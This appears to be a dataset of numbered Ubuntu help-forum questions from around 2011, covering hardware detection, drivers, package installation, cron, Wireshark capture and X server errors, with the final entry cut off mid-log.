90723	lenovo t60p with 4gb of ram , ubuntu 11.04 and 11.10 only see 3gb	i have a lenovo thinkpad t60p with 4gb of memory ( bios sees all 4gb ram ) . i have installed ubuntu 11.04 and 11.10 and both are only recognizing 3gb ram . please advise . thanks . updates used 32bit ver for both 11.04 and 11.10 . just installed 11.10 64 bit and machine now only sees 2.9 gb . intel core 2 duo processor t7600 thinkpad-t60p : ~ $ uname -a linux thinkpad-t60p 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:28:43 utc 2011 x86_64 x86_64 x86_64 gnu/linux flags : fpu vme de pse tsc msr pae mce cx8 apic etc , etc ... 4gb of crucial ram , memory test passed . current bios is 2.27 dated 3/21/11 sending memory back to vendor for replacement . hope that takes care of it .
90726	is it possible to give sudo access to only a particular command ?	background : i have a development machine with lamp setup . several developers would access the machine from time to time . every time they make some change in a configuration file they will need to restart the apache server using sudo service apache restart or sudo /etc/init.d/apache2 restart the question : what i want now is that every developer who accesses the machine does not have a sudo access to everything . rather , he/she should only be able to run the service command using sudo and nothing else . is it possible to do that ?
90734	install button in software center is disabled	for some unknown reasons install button is disabled in software center and therefore i am unable to install any software from software center . but it is possible to install software using command apt-get install package_name . i have internet connection through 3g modem but i think software center does n't have internet because it shows a notification saying 'no network connection ' ( sin conexi贸n de red ) . in the screenshot below you can see the problem i have described : edit 1 when i run it from terminal with software-center command it outputs following messages : 2011-12-28 22:31:30,618 - softwarecenter.ui.gtk3.em - info - em 's : 17 15 21 2011-12-28 22:31:31,028 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2011-12-28 22:31:31,102 - softwarecenter.ui.gtk3.utils - info - softwarecenter style provider for ambiance gtk theme : /usr/share/software-center/ui/gtk3/css/softwarecenter.css 2011-12-28 22:31:32,513 - softwarecenter.ui.gtk3.app - info - software-center-agent finished with status 0
90735	appindicator best practices in pygtk apps	i have problem adding appindicator to my pygtk app . when i place this into my init.py , before gtk.main ( ) , it works , but when i put it in my main window finish_initializing ( ) method , it does not get showed . any idea why ? if you look at quickly template they suggest to put it in indicator.py . i do n't have idea how that file should look like and why it works only in __init__.py ? can someone point me to existing app so i can see code example , i 'm interested in best practices for adding appindicator . example from quickly template looks ok , but not finished . thanks in advance .
90743	recovery kernel boots into root with no menu	i 've had this problem ever since the oneiric upgrade . recovery kernel boots straight into root prompt , with no menu . i also ca n't telinit 3 .
90744	python - pip module install 2.6 instead of 2.7	i use django 1.3 with python 2.7 on ubuntu 10.04 . $ python python 2.7.1 ... > > > i 'm trying to install the python module django-grappelli . $ pip install django-grappelli requirement already satisfied : django-grappelli in /usr/local/lib/python2.6/dist-packages apparently it 's installing into the python repo 's version ( 2.6 ) instead of 2.7 . how can i install it on 2.7 ?
90747	dissable titlebar unity 11.10	hello is it possible to hide the titlebar on the topbar on unity ( ubuntu 11.10 ) ? whean i use chrome on top bar appears the title of the current tab and i do not like it because the same title appears on chromes tab . is it possible to hide it ? or is it possible maximized widows not to merge with the top bar ? here is a screenshot :
90748	how do i get a zte mf651 usb modem working ?	at first , my modem was only detected by lsusb . it shows like this : bus 002 device 004 : id 19d2:0146 onda communication s.p.a. next , i installed usb-modeswitch and created a config file : vi /etc/udev/rules.d/zte_mf651.rules then filled it with : sysfs { idvendor } == '' 19d2 '' , sysfs { idproduct } == '' 0146 '' , run+= '' /usr/bin/eject % k '' , options+= '' last_rule '' now my modem is detected , dmesg shows ttyacm0 and ttyacm1 . after configuring my provider , it shows on the top menu bar , under the network connection icon . when i clicked it , the modem was connected , but there seems no internet connection.. it ca n't access internet via browser . while it works fine on windows . so , how to enable/optimize the internet connection ? is there any specific driver for this device on ubuntu ? any solution would be appreciated .
90752	how to find firefox path ?	i have firefox in start menu , but there is no `` properties '' like in windows . how to find out were firefox is installed and how to check path of link in menu ?
90754	why does switching users completely hang my system every time ?	i have a fresh install of 11.04 64bit , with 2 administrator accounts and 4 normal accounts . the 4 normal accounts ( the kids ' accounts ) do n't have passwords , they can login simply by clicking on their names . when any of the users -- either admin or normal -- tries to switch to another account by clicking in the top-right corner of the screen and selecting another user , the screen goes black and the entire system locks up . even ctrl+alt+f1 through f7 does nothing . this is reproducible 100 % of the time on this system . i can ssh into the box when the console locks up , and by running top , i see that xorg is consuming about 100 % of the cpu . looking at the output of `` ps axfu '' in bash while the system is in this `` locked up '' state , here is the lightdm and x process tree : user pid % cpu % mem vsz rss tty stat start time command root 1153 0.0 0.1 183508 4292 ? ssl dec26 0:00 lightdm root 2187 0.4 4.6 265976 164168 tty7 ss+ 00:43 0:21 \_ /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch stephane 2612 0.0 0.3 266400 10736 ? ssl 01:52 0:00 \_ /usr/bin/gnome-session -- session=ubuntu stephane 2650 0.0 0.0 12264 276 ? ss 01:52 0:00 | \_ /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session /usr/bin/gnome-session -- session=ubuntu stephane 2703 0.8 3.0 562068 106548 ? sl 01:52 0:08 | \_ compiz stephane 2801 0.0 0.0 4264 584 ? ss 01:52 0:00 | | \_ /bin/sh -c /usr/bin/compiz-decorator stephane 2802 0.0 0.3 265744 13772 ? sl 01:52 0:00 | | \_ /usr/bin/unity-window-decorator ... cut ... root 3024 80.6 0.3 107928 13088 tty8 rs+ 01:53 12:34 \_ /usr/bin/x :1 -auth /var/run/lightdm/root/:1 -nolisten tcp vt8 -novtswitch that last process , pid # 3024 in this case , is what has the cpu pegged . in case it matters ( i suspect it might ) here is what i think may be the relevant information for my video card , taken from /var/log/xorg.0.log : [ 3392.653 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/extensions/libglx.so [ 3392.653 ] ( ii ) module glx : vendor= '' firegl - amd technologies inc. '' [ 3392.653 ] compiled for 6.9.0 , module version = 1.0.0 ... [ 3392.655 ] ( ii ) loadmodule : `` fglrx '' [ 3392.655 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so [ 3392.672 ] ( ii ) module fglrx : vendor= '' firegl - ati technologies inc. '' [ 3392.672 ] compiled for 1.4.99.906 , module version = 8.88.7 [ 3392.672 ] module class : x.org video driver ... [ 3392.759 ] ( == ) fglrx ( 0 ) : ati 2d acceleration architecture enabled [ 3392.759 ] ( -- ) fglrx ( 0 ) : chipset : `` amd radeon hd 6410d '' ( chipset = 0x9644 ) lastly : i did see this posting : change user on 11.10 hangs system ... but i checked , and the libpam-smbpass package is n't installed on this system .
90759	usb printer canon pixma mp550 installed , recognized , but does nothing	core i7 , 64bit , ubuntu11.10 : all new , also me , have parallel win7 and run befor suse11 . plug usb , printer canon pixma mp550 recognised , suitable gutenprint installed , free for all on the server . tried other drivers , because *icc not found , still no print out ! seems , that the driver is in a loop , donâ´t understand the errors really . installed ia32-libs for debian i386 driver , wrong architecture first , with sudo installed , crash by plugging the printer . now gutenprint again , printer starts cleaning , then nothing more . scan is working fine . may be it is this : cupsdreadclient : 21 closing because keep-alive disabled but donâ´t know , how to change . perhaps also misunderstanding between en-driver and german printerhardware . or : can not disable printing from internet . what can i do ? also i am missing yast or hardwaremanager , is there something same ?
90760	what 's the preferred way to distribute self written unity lenses ?	with gnome-shell there is https : //extensions.gnome.org where a developer could easily submit and distribute an self written gnome-shell extension . what 's the preferred way with a self written unity lens ? creating an ppa for a lens seems more work than uploading the files to a website . on the other hand nobody could find my self written lens when i 'm only create an ppa ? !
90762	instability on ubuntu 11.10 for wifi intel board 4965	i 'm a ubuntu user for a long time and always preferred to use lts versions . but i decided to give a chance to 11.10 while 12.04 do n't show up . but the wifi on 11.10 is not very stable which keeps me back on my 10.04 installation . here is the deal i have the following card ( lspci ) : 0c:00.0 network controller : intel corporation pro/wireless 4965 ag or agn [ kedron ] network connection ( rev 61 ) i use my laptop ( mainly ) in three places . at home i use wpa and it works just fine . at work and the university they use wpa2 and it stays very unstable . it connects successfully but after a few minutes it drops . only a new reconnection would bring it back online . tks
90764	how do i create a deb package for a single python script ?	i have a single python script that i want to distribute as a deb package . it is a indicator which shows local date in unity panel . i did follow create a .deb package from scripts or binaries but i could not create a deb package because it fails . can someone give me a step-by-step instruction on what i should do ? as far as i know this script depends on python-appindicator . note : i do not want any links to debian/ubuntu packaging instructions . i have seen most of them . i do n't find them beginner friendly .
90766	appindicator theme dependent icons	i am developing pygtk app with appindicator . i create my appindicator similar like in this example . in this example `` indicator-messages '' stock icon is used . so , i can : use stock icon ( from existing theme ) create custom icon the question is , if i use stock icon , how can i determine what icons are available ( is this consistent on all os-es , is it provided by gtk ) ? will this behave same on different linux distributions ? or , if i create custom icon , how can i detect which theme is active ( i suppose i need to have dark and light icon version ) and render appropriate icon ? what is with other themes , looks like it 's hard to support all of them ? on http : //unity.ubuntu.com/projects/appindicators/ it says `` themable panel icons â you can set a specific icon to be a panel icon for an indicator : this should make it easier for creating single colour panel icons for light and dark themes . '' but it does not says how to achieve this ? i found weather indicator does it , but with stock icons i think .
90767	how to pass arguments in a script using gnome-terminal	as part of a script i have gnome-terminal -e `` process involving another user '' once executed this line , i have to write in the terminal 3 times the password of this user . i wonder how can i automate it , that is , without typing the password . something as echo `` password '' ( 3 times ) | gnome-terminal -e `` process involving another user '' thank @ rao_555 , but i 'm afraid things are not so easy . i use the command gnome-terminal -- working-directory= '' /var/singlecellserver/single-cell-server '' \ -e `` sage -python trusted_db.py -w 50 -- untrusted-account untrusted @ localhost '' & so , i do n't want pass arguments to sage -python ... . once sage -python ... is launched i need to give 3 times untrusted 's password . i tried gnome-terminal -- working-directory= '' /var/singlecellserver/single-cell-server '' \ -x sage -python trusted_db.py -w 50 -- untrusted-account untrusted @ localhost $ 1 $ 1 $ 1 & but no success . solved the problem was related to sudo and ssh . since it is necessary to launch the process as su , the access via ssh to the untrusted account needs the ssh keys also in the root folder .
90768	why does the program launch one way but not the other ?	i have this problem creating a launcher . i downloaded a tar.gz and extracted it : cavestoryplus from the humble bundle 4 . if i double click the executable in nautilus , it launches . if i run ~/cavestoryplus/cavestory+ in the terminal it does n't launch but if i run cd cavestoryplus & & ./cavestory+ it launches . then if i try to create an application launcher in main menu ( alacarte ) , nothing works for me even if i state `` application in terminal '' with the above command . ( edited post to show i ran the command with the full path )
90771	hide/show grub menu	i have a dual-boot ubuntu 11.10 and windows 7 , i rarely use windows 7 and find the grub menu very annoying . i was wondering if anyone knows how to hide the grub menu in ubuntu 11.10 and be able to get it back if i hold a button on startup ( for example shift ) .
90773	how to kill non-responsive gui task under unity ?	i am searching for a newuser-friendly way to kill non-responsive gui applications under unity . i looked over the shoulder of a new unity user who tried to use gscan2pdf - and gscan2pdf seems to be really broken - after not much tinkering it consumed much cpu und memory , the pc began trashing and the user needed to immediately kill the gscan2pdf gui which was full-screen , non-responsive and had the focus . ok , i know some ways how to do it : hit alt+f2 and type xkill - > select the window hit alt+f2 start xterm , use top or pgrep and then kill pid or directly use pkill both are ways which are not very intuitive for gui centric users . is there some unity shortcut to get something like xkill ? or is the best gui-way to add a top-like gui to the unity-starter ? and which one ?
90783	where is the adobe flash player settings manager ?	i want to allow midomi website to access my microphone . the only way i know is to access this link http : //www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html . however , that link does not give me a way to save the setting i made , so to no avail . i wonder if i can find the setting manager on my local ubuntu system ? thanks and regards !
90784	how do i set up hotkeys for a xterm ?	when i do a ssh to an opensuse machine and use yast i have to use tab intead of alt+y for help for example , i do n't know what else to say ... my question is how to set up this to have a propper xterm console . additin : xterm and/or lxterminal maybe this one has some features to add , really do n't know .
90794	multimonitor on amd catalyst and 11.10 feels slowish	i have an amd x6 desktop with plenty of ram and a dual lg monitors driven by a radeon hd 5830 . the monitors are on dvi ports . amd catalyst version 11.11 . tear free is on . sync to v-black in ccsm , is disabled . multi monitor works ok , i have no problems dragging applications , working seemless between the two monitors , no instability issues whatsoever . however , the whole experience with dual monitors is a bit sluggish . window maximizing and minimizing feels slow , effects feel slower , the whole desktop experience feels other than on a single monitor . is this an ubuntu issue or a gpu issue ? is there something to do to improve the overall experience ? will 12.04 improve on these issues ? thanks
90795	how to copy file in ubuntu one api	is it possible to copy file from one folder to another with ubuntuone api ? in this manual https : //one.ubuntu.com/developer/files/store_files/cloud/ there is nothing about ways to copy file .
90797	any compelling reasons to perform a `` do-release-upgrade '' ?	i recently performed a `` do-release-upgrade '' on one of my company 's development machines to go from 11.04 ubuntu server to 11.10 . the process actually downgraded a custom php installation and i had a heck of a time getting the dependencies right to recompile to the newer version . that said , i 'm a little hesitant to perform the upgrade on our production machine . i then got to thinking , i want to keep up to date on software updates and security fixes , but do i really need to upgrade ubuntu releases ? wikipedia roughly describes a linux distribution as a certain kernel combined with a set of software packages . now , if i run apt-get to manually do software and kernel updates ( of which i can choose what to upgrade and what not to upgrade ) , how is it really any different ? only thing i can think of is that if new packages were added as part of a new version , i would n't get those by default . if i need them though , i can add them myself . am i missing anything vital ? this also relates to a similar question i 've had as to if there is any real advantage with using an lts release . if a software package has an upgrade , how can you be stopped from upgrading to it ? thanks .
90802	how to install ffmpeg without root ?	i want to install ffmpeg , however it seems that its impossible without root . there are sources , but i have to compile it somehow . how to compile it ? i just need ffmpeg `` exec '' .
90804	washington post gallery not loading in neither firefox/chromium	using ubuntu 11.04 . for some reason , ever since i installed ubuntu on this system , web galleries on washingtonpost.com do not function properly . they simply load as all black . an example url of such a gallery is http : //www.washingtonpost.com/lifestyle/style/best-books-of-2011/2011/12/06/giqanfuwco_gallery.html i 'm using the mozillateam/firefox-stable ppa and just installed chromium from the repositories to test . i have not updated to ubuntu 11.10 , but i am fully updated for 11.04 . thank you for your time ! edit : flash works totally fine in all other cases . even yahoo ! photo galleries load properly . i 'm wondering if this is merely a compatibility issue with the washington post and linux ( like netflix not working ? ) or if there is something i can do about it . addons : adblock plus 2.01 ( but i 've tried disabling this and it makes no difference ) . global menu bar integration 2.01 , and ubuntu firefox modifications 0.9.2 .
90806	11.10 wo n't boot cleanly on asus p8z68-v/gen3	i have installed ubuntu 11.10 on my computer and i have a problem booting it up . at boot , the system lands me in the efi bios setup . from there , i specify that i want to boot from the first hd ( where ubuntu is installed ) , and the system boots . does anyone know how to make the system stop dropping me into the bios setup and just boot ? motherboard : asus p8z68-v/gen3 cpu : intel core i5 . disk : wd sata 2tb .
90816	how to run a script only once per day with cron without specifying execution time	i wan to run a backup script once per day but i dont want to specify a certain time , just once per day . i 've read that the @ daily cron attribute runs every day at 00:00 but i do n't know if the receiving server will be up at this time . is it possible to configure cron to run this script just once per day irrespective of the time ? or run the script until it succeeds and then try again the next day ? @ reboot would be an option however the sending end might reboot several times per day in which case it would lead to unnecessary backups . thanks a lot
90817	asus eee pc 1101ha wo n't boot after installation	i am trying to install ubuntu 11.10 from a usb stick i created using the universal usb installer 1.8.7.4 . however after the ubuntu purple loading screen i get a prompt with 2 error messages : init : lightdm main processs ( 3366 ) terminated with status 1 init : plymouth-stop pre-start process ( 3841 ) terminated with status 1 looking in /var/log/xorg.0.log indicates : ( ee ) open /dev/fb0 : no such file or directory [ .. ] no screens found i tried following the instructions on installing the gma500 emgd driver from here : https : //wiki.ubuntu.com/hardwaresupportcomponentsvideocardspoulsbo # emgd_1.8 onto the usb stick with a 'casper ' filesystem , the installation is successful however when rebooting still no x , looking at the log file again it does not contain the string 'emgd ' at all . however lsmod indicates the 'poulsbo ' module is loaded . does anyone have experience with installing 11.10 ( oneiric ) on this specific hardware ? any tips on how to get into the installer ?
90824	how do i get the radeon hd 6650m in my lenovo g770 laptop working ?	as stated in the topic , i have the following problem : there 're two vgas in my lenovo g770 laptop with ubuntu 11.04 , namely intel mobile hd and amd radeon hd 6650m . and if integrated videocard is working quite fine , the discrete one does n't work at all . what i try to do , is to make the ati card work , no matter if it will be switchable graphics , or just ati working at its full potential . i tried proprietary drivers : fglrx , compiling ati 's drivers in various ways ; standard ubuntu driver . there 's no option in bios to turn just discrete adapter on , so i got to stick to `` switchable '' . ati catalyst does not allow me to switch video adapters while integrated one is active . furthest i got myself is working vgaswitcheroo module . but here are some problems too . first of all , it does not respond to echo dis command , but does turn the card off with echo off . i figured that all i have to do is echo ddis to make delayed switch , and reboot x server to make use of ati adapter . what happens then is black screen , sometimes some of console booting lines are visible ; although login screen is loading , but not visible ( i can tell by sounds and by shortcuts working , so i can login in blind way ) . i guess this means that ati card is finally working , but something is wrong with it . because of the `` black screen '' glitch i can not really even check what card is working .
90826	ubuntu equivalent to bsd ports ?	is there an ubuntu equivalent to the bsd ports system ? i realize that the linux and ubuntu culture tends to install new software from binaries , but having used bsd ports within both bsd and mac os x i find it very simple and elegant and the idea of compiling from source on demand , with all dependencies figured out for you , is very powerful .
90830	why does n't skype appear in the upper panel ?	i normally start skype and it appears in the upper panel and works . but now when i start it , it does n't appear ! but it works like normal . stackapplet is appearing in the panel . my whitelist : [ 'javaembeddedframe ' , 'mumble ' , 'wine ' , 'skype ' , 'hp-systray ' , 'scp-dbus-service ' , 'jupiter ' ] i 've tried to remove jupiter to purge skype to delete the panel and create a new one this is how it looks right now . all my other applications work except skype . i guess this is not a normal message to get when i type : skype -version ? ! skype version : 2.2.0.35
90832	what software is available for folder lock ?	what software is available for locking folder and files just like folderlockxp software in windows ?
90836	packages have unmet dependencies , why ?	i get this error while trying to install a package as follows : sudo add-apt-repository ppa : v-launchpad-jochen-sprickerhof-de/pcl sudo apt-get update sudo apt-get install libpcl-all the first two do n't issue any error message , but the last one gives : the following packages have unmet dependencies : libpcl-all : depends : libpcl- 1.3-all but it is not going to be installed e : unable to correct problems , you have held broken packages . how is that even possible ? if package xxx depends on package yyy , why is n't yyy installed then ? usually , when you run apt-get install xxx it will automatically install all packages xxx depends on . what may prevent it from doing so ? but it is not going to be installed well why is n't it ?
90841	problem with dvds	when i try to play video dvds on ubuntu 11.10 always get this error message : `` could not read dvd . this may be because the dvd is encrypted and a dvd decryption library is not installed . '' i tried to solve this with adding restricted-extras and libdvdcss2 . but i still get this message . any ideas to fix that ?
90844	can i use x windows to show the gui of a remote process ?	i remember using screen emulators like hummingbird to remotely display x processes on windows , by adjusting environment variables like term and screen ( or so ) and substituting things like vt100 and ip addresses of the form nnn.nnn.nnn.nnn:0 is it possible using ubuntu , osx , between each other between virtual machines etc ? right now i want to display system monitor graphically with real time updates on an ubuntu box with an ssh session into a mac osx 10.7.2 workstation . i can get snapshots using ps but i want to monitor the machine live as i am trying to debug responsiveness . any ideas ?
90845	pygtk application icon blurred in unity	i have 128x128 icon referenced in main window glade file like < property name= '' icon '' > ../media/my-icon.svg < /property > . i tried , with both svg and png , but it is always very blurred in ubuntu app switcher ( alt + tab ) . i noticed same when creating application from template using quickly , ubuntu logo is very blurred as well . any idea why this might happen ?
90849	aspm default enabled on kernel 3 ?	i would like to know if `` pcie_aspm=force '' is already enabled on kernel 3 or if it will be only for kernel 3.3 like the phoronix website says . i would like to know because i want to enable it on my acer 3820tg to see if the battery lasts a little more . i 'm using ubuntu 11.10 64 bit . ( ps : sorry for my bad english but i 'm portuguese ) celso
90853	file notes tab gone in nautilus 3.2.1	it seems that the `` notes '' tab in the `` file properties '' dialog is gone in nautilus 3.2.1/ubuntu 11.10 . how can you use the notes feature now ? what do you do about notes that you have already made ? is there a patch or an extension for this , or is it planning to be fixed in the future ? ( why was it removed ? ) ( related question about portability of notes . )
90857	wireshark capture only packet from and to my pc when in promiscuous mode	i 've installed wireshark and configured it to let my user run it with all needed privileges ( i enabled dumpcap and added my user to wireshark group , then restarted ) . devices are shown and capture starts well . the problem is that only packets sent to and directed to the pc where wireshark is running are captured . obviously i enabled promiscuous mode in the capture options dialog . for example , if i run wireshark and then surf the web on firefox , packets are captured . if i start browsing with my smartphone , instead , no packet is captured ( pc and smartphone are connected to the same domestic wifi network ) . i 'm working with a wifi device wlan0 with ath9k drivers . here you are the output of ifconfig wlan0 and lspci | grep wireless : lorenzo @ xubuntu : ~ $ ifconfig wlan0 wlan0 link encap : ethernet hwaddr 5c : ac:4c:32 : dc:1d indirizzo inet:192.168.1.100 bcast:192.168.1.255 maschera:255.255.255.0 indirizzo inet6 : fe80 : :5eac:4cff : fe32 : dc1d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1585 errors:0 dropped:0 overruns:0 frame:0 tx packets:1782 errors:0 dropped:0 overruns:0 carrier:0 collisioni:0 txqueuelen:1000 byte rx:970355 ( 970.3 kb ) byte tx:401610 ( 401.6 kb ) lorenzo @ xubuntu : ~ $ lspci | grep wireless 03:00.0 network controller : atheros communications inc. ar9287 wireless network adapter ( pci-express ) ( rev 01 ) what i want to achieve is to examine the network traffic of my smartphone using my pc running wireshark , both connected to the same personal domestic wifi access point . please help me ! !
90858	can i run sql server on ubuntu ?	my company develops software with two sides : client and server . i 've installed microsoft sql server on windows and am running the client side on ubuntu with some configuration . but i 'm wondering : is there a way to run ubuntu as the server instead and install sql server on it ?
90859	downloading error while installing virtualbox guest additions	i have installed windows7 as guest in my ubuntu 11.10 host using virtualbox . now the problem is when i try to install the virtualbox guest additions i am getting the following error .
90861	is it possible to use wubi to download an older version ?	ubuntu installer for windows does n't give us an option of downloading older versions of ubuntu . can we have an option to download older versions of ubuntu , 8.04.1 or later versions ? by default ubuntu installer for windows downloads latest version of ubuntu
90865	uninstalling a software installed via terminal	how to uninstall a software which i have installed via terminal . i have recently installed the realtek high definition driver which is now a big mess with my audio system . after installed that software all the sound channels were set to mute by default ( as mentioned in the installation manual ) . now i am unable to open alsamixer . i have installed alsamixer-gui . it open the some window but i am unable to adjust the controls . i want to remove the above mentioned software and i want to set my audio system to previous state . can somebody suggest me how to carry out uninstallation . thanks in advance srinivas
90867	black screen in vmware after rebooting	i have installed ubuntu server 11.10 in vmmware ( running in a windows 7 machine ) . everything went fine for the first time but now i cant start it . i started vmware , then it appears the purple ubuntu screen and after then everything goes black with the cursor blinking . i have tried to re-create the virtual machine and the problem remains . any ideas ?
90869	ca n't install on an emachines e725	when i install using wubi and choose ubuntu 11.10 , i get a purple screen , then a black screen .
90874	not recognized as operating system on startup	i am new to ubuntu and just decided to install it in ( on my new lenovo thinkpad ) in addition to my windows 7 operating system . now , whenever i reboot the computer , it only runs window 7 . i went ( in windows ) to control pannel ▸ system ▸ advanced settings ▸ startup and ubuntu is not even listed as a choice for operating system . i tried installing ubuntu again , but now it wants to partition the already partitioned windows folder . i ca n't figure out how to get ubuntu , which seems to be installed , to run . i saw on another question here that i could be able to edit my mrb settings using easybcd but i can not figure out how to choose ubuntu as an operating system . my disk is already partitioned ( seen from the attempted second install ) so i 'm pretty sure it is on the disk . basically , how can i get ubuntu to run when i ca n't choose it as an operating system ? thank you for your help .
90877	ubuntu 11.10 wo n't detect my second monitor	when ubuntu boots , the second monitor mirrors my other monitor , but when the login screen pops up , the monitor does n't get any signal from my computer . when i go to monitor setup , it is not detected . if i unplug my first monitor , the second works fin with ubuntu . when i tried 11.10 on a flash drive , it worked fine as a dual monitor . the default seems to be vga over the dvi connection . help ?
90879	where can i get drivers for a lexmark x5150 printer ?	where can i find the proper drivers for a lexmark x5150 printer ? i do n't have an internet connection on this computer .
90880	gnome classic split screen plugin	how do i get gnome classic to have a split screen ? i want it to be like it is in unity where if i drag something to the side it maximizes its size to cover just half the screen , and then drag something to the side to i do the same on the other side of the screen . i like gnome classic a lot more than unity but i like that feature of unity . i am on a ubuntu 11.10 i am on a hp laptop with 3 gb of ram and 2.7 dual core prossesser
90881	gui issues ubuntu 11.10 gnomeshell	i am facing a slightly weird issue . gui 's of eclipse , emacs or vim do not work on my comp . please see the processor usage at the top in http : //www.cse.iitb.ac.in/~namitk/eclipse.png , http : //www.cse.iitb.ac.in/emacs.png ( also see vim.png at the same url ) . when i run these programs , the processor usage shoots up but the program gui fails to load completely ( for e.g in emacs/vim - the cursor never appears ) . i have tried waiting for 10-15 mins just in the hope - but nothing loads . i think its a gui issue because the non-gui versions ( emacs -nw and vi/vim ) work normally without any issues . has anyone faced such an issue previously ? could someone please suggest a way of debugging this issue ? my configuration is ( output of uname -a ) linux namit-thinkpad-t61 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:50:42 utc 2011 i686 i686 i386 gnu/linux . please let me know if any other info is needed .
90886	how to set up multiseat network through a usb connection ?	this year i started a project called the brighter future project . we collected donations in the usa and used them to buy/assemble computers and bring them to other places with more need . we are now in a little town called naranjal , ecuador trying to set up a multiseat network with a computer running edubuntu 11.10 as the server . i 'm using the hp t100 zero client as clients . i have installed edubuntu , lstp live , and thin client manager in the server . there are a few blogs that show how to configure a network in linux through ethernet , but almost nothing on how to do it with usb connections . the t100 only connects to the server through usb . i was hoping you could give me a hand figuring this out asap , as my time here in ecuador is limited .
90889	bash evaluation	i know that in bash if statements can be evaluated with expr by using : if [ [ 5 > 0 ] ] ; then echo true ; fi how does bash evaulate the following form of if ? if [ 5 -gt 0 ] ; then echo true ; fi
90892	32-bit driver on a 64-bit system	i have a printer lexmark x6675 . the only driver available for it is 32-bit but i want to run a 64-bit system . is there any way to use the native driver supplied by lexmark ?
90897	menu editor in xubuntu - not alacarte	how can i editting menu in xfce/xubuntu ? i know alacarte , but it has many gnome dependencies . next i know lxmenueditor ( from here ) , but i donâ´t know how can i create new menu categories , for example network anylysis . have anyone any idea how can i do it ? thanks for your idea/answer .
90904	why does system monitor and nautilus give me different disk usage numbers ?	ubuntu 10.4 lts encrypted hard-drive i recently deleted about 30 gb of files from a folder on my desktop . after restarting however , i found that , while i can not find the files anywhere , my computer tells me that i only have 600mib free/available space . system monitor tells me that i have 92gib total , 86gib used , 5gib free and 667mib available ( using the command df confirms this ) while disk usage tells me when i scan the filesystem that it is 53gib size , with 667mib available . why are they telling me different disk usage numbers , and how do i completely erase the 30g of files so as to get more free space ? thanks !
90906	turn off microsoft explorer touch mouse haptic feedback ?	i got a new microsoft explorer touch mouse recently , and i like it a lot . the one thing that drives me a little batty is the haptic feedback `` buzzer '' it uses when you scroll . the windows driver has a way to turn it off , and i 'd like to figure out how to turn it off on my 11.10 workstation . any ideas ?
90907	determine what buttons are in ccsm ?	in ccsm , there are a lot of different options for mouse button events : there are basically twenty different mouse buttons registered for my touchpad , presumably . how can i test to see which buttons are which ? is there something i could use which will spit out what button number i 've hit so i can see ?
90912	how to change putty color scheme on linux user basis ?	when i ssh into my server all but one of my users has the color scheme . the one that does n't , well everything shows up as gray text . is there a way i can change this color scheme ? also , why would that one user 's color scheme allow for only gray text when i ssh from putty , while the others have the different file types colored ? my server is ubuntu with gnome and when i go into the terminal , this user has a color scheme ( ex . ls command lists folders as light blue and bold )
90915	troubleshooting x server . ( ee ) failed to load module `` nv '' ( module does not exist , 0 )	i am attempting to learn opengl . due to a hardware failure my primary machine is now an old laptop that has outdated opengl . my box running ubuntu 11.10 server edition does have a suitable graphics card . i would like to develop console to full screen opengl programs on my server box . it is currently my understanding that i need to have x server and a window manager installed in order for opengl programs to function . i used the following commands : sudo apt-get install xserver-xorg xserver-xorg-core sudo apt-get install openbox sudo apt-get install nvidia-173 to test x server i ran xinit which gave me this output : x.org x server 1.10.4 release date : 2011-08-19 x protocol version 11 , revision 0 build operating system : linux 2.6.24-29-server x86_64 ubuntu current operating system : linux maximos-ubuntu 3.0.0-12-server # 20-ubuntu smp fri oct 7 16:36:30 utc 2011 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.0.0-12-server root=uuid=ffdf63ee-6980-46dc-bc6d-b1e72e0abcce ro build date : 19 october 2011 05:21:26am xorg-server 2:1.10.4-1ubuntu4.2 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.22.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : tue dec 27 17:18:18 2011 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) xinit : unable to run program `` xterm '' : no such file or directory specify a program on the command line or make sure that /usr/bin is in your path . xinit : connection to x server lost waiting for x server to shut down ddxsiggiveup : closing log my xorg.0.log : [ 465.316 ] x.org x server 1.10.4 release date : 2011-08-19 [ 465.316 ] x protocol version 11 , revision 0 [ 465.316 ] build operating system : linux 2.6.24-29-server x86_64 ubuntu [ 465.316 ] current operating system : linux maximos-ubuntu 3.0.0-12-server # 20-ubuntu smp fri oct 7 16:36:30 utc 2011 x86_64 [ 465.316 ] kernel command line : boot_image=/boot/vmlinuz-3.0.0-12-server root=uuid=ffdf63ee-6980-46dc-bc6d-b1e72e0abcce ro [ 465.316 ] build date : 19 october 2011 05:21:26am [ 465.316 ] xorg-server 2:1.10.4-1ubuntu4.2 ( for technical support please see http : //www.ubuntu.com/support ) [ 465.316 ] current version of pixman : 0.22.2 [ 465.316 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 465.316 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 465.316 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : tue dec 27 16:53:59 2011 [ 465.316 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 465.317 ] ( == ) no layout section . using the first screen section . [ 465.317 ] ( == ) no screen section available . using defaults . [ 465.317 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 465.317 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 465.317 ] ( == ) no monitor specified for 